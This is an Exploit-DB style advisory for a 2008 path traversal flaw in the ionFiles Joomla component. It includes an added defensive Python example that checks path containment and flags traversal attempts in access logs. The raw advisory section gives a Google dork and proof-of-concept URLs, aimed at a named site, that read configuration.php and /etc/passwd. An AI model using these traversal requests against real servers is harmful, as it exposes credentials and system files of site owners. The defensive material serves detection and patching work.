Vendor: ionFiles
By: Vrs-hCk
CVSS: 7.5 (HIGH)
Vulnerability Type: Arbitrary File Download
CWE: 22
Product Name: ionFiles
Affected Version From: 4.4.2002
Affected Version To: 4.4.2002
Patch Exists: Yes
Related CWE: N/A
CPE: a:codecall:ionfiles:4.4.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Arbitrary File Download Vulnerability

A vulnerability exists in the ionFiles 4.4.2 component for Joomla! CMS that allows an attacker to download arbitrary files from the server. The cause is that the download.php script does not sanitize user-supplied input to the 'file' parameter before using it as a file path. An attacker can exploit this by sending a crafted HTTP request to download.php in which the 'file' parameter contains directory traversal sequences, causing the script to serve files from outside the intended download directory.

Mitigation:

Upgrade to the latest version of ionFiles 4.4.2 Component for Joomla! CMS.
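The following is an added example and is not code from the ionFiles component or from the advisory author. It shows the two things a defender wants for this class of bug: a path-containment check of the kind download.php lacks (resolve the requested name under a fixed base directory and refuse anything that lands outside it), and a matcher that flags traversal attempts against the com_ionfiles download endpoint in web server access logs. The log lines and the temporary download directory are constructed for the example; the function names are the author's own choices, not names from the component.

```python
"""Path-containment check and access-log matcher for an arbitrary file download
endpoint. Added example; not part of the ionFiles component or the advisory."""
import os
import re
import tempfile
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit


def resolve_download_path(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path of `requested` inside `base_dir`, or None when the
    request escapes the directory (traversal, absolute path, symlink pointing
    outside) or does not name a regular file. This is the check that a
    `$file = $_GET['file']` pattern omits."""
    if not requested or "\x00" in requested:
        return None
    base = os.path.realpath(base_dir)
    # Strip leading separators so an absolute path cannot bypass the join,
    # then let realpath collapse '..' segments and follow symlinks.
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/\\")))
    # Containment test on the resolved path: '../../configuration.php' style
    # input resolves to a location whose common prefix with base is not base.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


# Matches a '..' path segment anywhere in a decoded file parameter.
TRAVERSAL_SEGMENT = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# Request line from a Combined Log Format entry, e.g. "GET /x?y=1 HTTP/1.1".
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def flag_traversal_requests(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, decoded 'file' value) for requests to the
    com_ionfiles download.php endpoint whose 'file' parameter contains a
    traversal segment or an absolute path, including URL-encoded variants."""
    hits = []
    for idx, line in enumerate(log_lines):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group(1))
        if not parts.path.endswith("com_ionfiles/download.php"):
            continue
        for value in parse_qs(parts.query).get("file", []):
            decoded = unquote(value)  # parse_qs decoded once; catch double encoding
            if TRAVERSAL_SEGMENT.search(decoded) or decoded.startswith(("/", "\\")):
                hits.append((idx, decoded))
    return hits


# Constructed sample log lines (not from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Oct/2008:10:00:01 +0000] "GET /components/com_ionfiles/download.php?file=docs/manual.pdf&download=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [23/Oct/2008:10:00:07 +0000] "GET /components/com_ionfiles/download.php?file=../../configuration.php&download=1 HTTP/1.1" 200 2210',
    '203.0.113.5 - - [23/Oct/2008:10:00:09 +0000] "GET /components/com_ionfiles/download.php?file=..%2F..%2F..%2Fetc%2Fpasswd&download=1 HTTP/1.1" 200 1700',
    '198.51.100.9 - - [23/Oct/2008:10:01:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9000',
]


def demo_containment() -> Dict[str, bool]:
    """Build a throwaway download directory (constructed data) and report which
    requested names the containment check admits. Returns {request: allowed}."""
    with tempfile.TemporaryDirectory() as base:
        os.makedirs(os.path.join(base, "docs"))
        with open(os.path.join(base, "docs", "manual.pdf"), "wb") as fh:
            fh.write(b"%PDF-1.4 constructed sample\n")
        requests = [
            "docs/manual.pdf",                       # legitimate download
            "../../configuration.php",               # traversal out of base
            "../../../../../../../../etc/passwd",    # traversal to filesystem root
            "/etc/passwd",                           # absolute path
            "docs/../docs/manual.pdf",               # normalises back inside base
            "docs/missing.pdf",                      # inside base but absent
        ]
        return {r: resolve_download_path(base, r) is not None for r in requests}


if __name__ == "__main__":
    for request, allowed in demo_containment().items():
        print(f"{'ALLOW' if allowed else 'DENY ':5} {request}")
    for idx, decoded in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt in log line {idx}: file={decoded}")
```

The containment check deliberately tests the resolved path rather than rejecting input that merely contains "..": a name like `docs/../docs/manual.pdf` is harmless once normalised, while a symlink inside the download directory that points elsewhere is caught only by resolving first. The log matcher decodes the parameter a second time after `parse_qs` so that double-encoded variants are not missed.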
Source

Exploit-DB raw data:

[o]------------------------------------------------------------------------------------[x]
 |  Arbitrary File Download Vulnerability                                               |
[o]------------------------------------------------------------------------------------[o]
 |  Software : ionFiles 4.4.2 Component for Joomla! CMS                                 |
 |  Vendor   : http://forum.codecall.net/                                               |
 |  Date     : 23 October 2008                                                          |
 |  Author   : Vrs-hCk                                                                  |
 |  Contact  : d00r[at]telkom[dot]net                                                   |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    inurl:com_ionfiles

[»] Vulnerable

    ./download.php

    Line 32: $file = $_GET['file'];
    Line 33: $download = $_GET['download'];
    Line 66 - 91

[»] Exploit

    http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1

[»] Proof of Concept

    http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
    http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1

[o]------------------------------------------------------------------------------------[x]
 |  Greetz                                                                              |
[o]------------------------------------------------------------------------------------[o]
 |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
 |  Jack, Darmawan, Mario, Zeth, Angela Chang, Janroe, Lukman, Didy, Anthonius,         |
 |  Daus, Rijal, Andrei, Toyong, dkk ... Indonesia Banget xixixix ... :))               |
[o]------------------------------------------------------------------------------------[o]

# milw0rm.com [2008-10-22]